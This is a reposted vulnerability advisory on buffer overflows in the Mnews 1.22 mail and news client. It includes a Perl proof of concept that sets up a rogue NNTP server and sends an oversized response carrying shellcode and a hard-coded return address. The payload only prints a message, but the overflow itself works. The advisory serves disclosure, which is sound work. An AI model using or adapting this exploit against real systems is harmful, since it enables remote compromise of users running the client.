|
COMMAND Mnews local and remote overflow vulnerabilities SYSTEMS AFFECTED version 1.22, maybe older too PROBLEM zillion [http://www.snosoft.com] found following, as reported in Strategic Reconnaissance Team Security Advisory (SRT2002-04-31-1159): Mnews is a small console based email and news client which is often installed setgid mail. Several local and remote overflows have been identified in this package. Local overflows where found in the -f, -n, -D, -M, -P parameters and in the JNAMES, MAILSERVER environment variables. The remote overflow resides in the code responsible for processing responses received from the NNTP server. For example the following response will result in an overflow: 200 <a x 770> If you look at the source code of mnews you will see that this package is very outdated and dangerous to use on todays Internet. Impact ====== Local users might be able to elevate their privileges on the affected systems. Remote malicious server owners can use mnews to penetrate an affected system. Proof of Concept ================ #!/usr/bin/perl -w # # Remote FreeBSD exploit for the Mnews port version 1.22 which is shipped # with the 4.5-RELEASE ports collection. # # This exploit is pretty harmless as it only prints a small message to # stdout (NAI?). # # Written by zillion[at]safemode.org (!shit) # # http://www.safemode.org # http://www.snosoft.com use IO::Socket; $shellcode = \"\\xeb\\x21\\x5e\\x31\\xc0\\x31\\xdb\\xb3\\x3c\\x80\\xeb\\x32\\x88\\x1e\\x88\". \"\\x5e\\x14\\x6a\\x15\\x56\\x6a\\x01\\xb0\\x04\\x50\\xcd\\x80\\x31\\xc0\\x50\". \"\\xb0\\x01\\x50\\xcd\\x80\\xe8\\xda\\xff\\xff\\xff\\x23\\x57\\x61\\x73\\x73\". \"\\x73\\x73\\x75\\x70\\x70\\x70\\x70\\x70\\x20\\x21\\x21\\x20\\x3f\\x3f\\x3f\". \"\\x23\"; # normal \\x90 nops don\'t work here.. $nop = \"A\"; $esp = 0xbfbff65e; $off = \"-70\"; $size = 762; for ($i = 0; $i < ($size - length($shellcode)); $i++) { $buffer .= \"$nop\"; } $buffer .= $shellcode; $buffer .= pack(\'l\', ($esp + $off)); $buffer .= pack(\'l\', ($esp + $off)); printf(\"Starting to listen for incoming connections... buffer size %d\\n\",length($buffer)); print(\"The new return address: 0x\", sprintf(\'%lx\',($esp + $off)), \"\\n\"); my $sock = new IO::Socket::INET ( LocalPort => 119, Proto => \'tcp\', Listen => 1, Reuse => 1, ); while($cl = $sock->accept()) { sleep 1; print $cl \"200 $buffer\\n\"; sleep 3; } SOLUTION Stop using Mnews.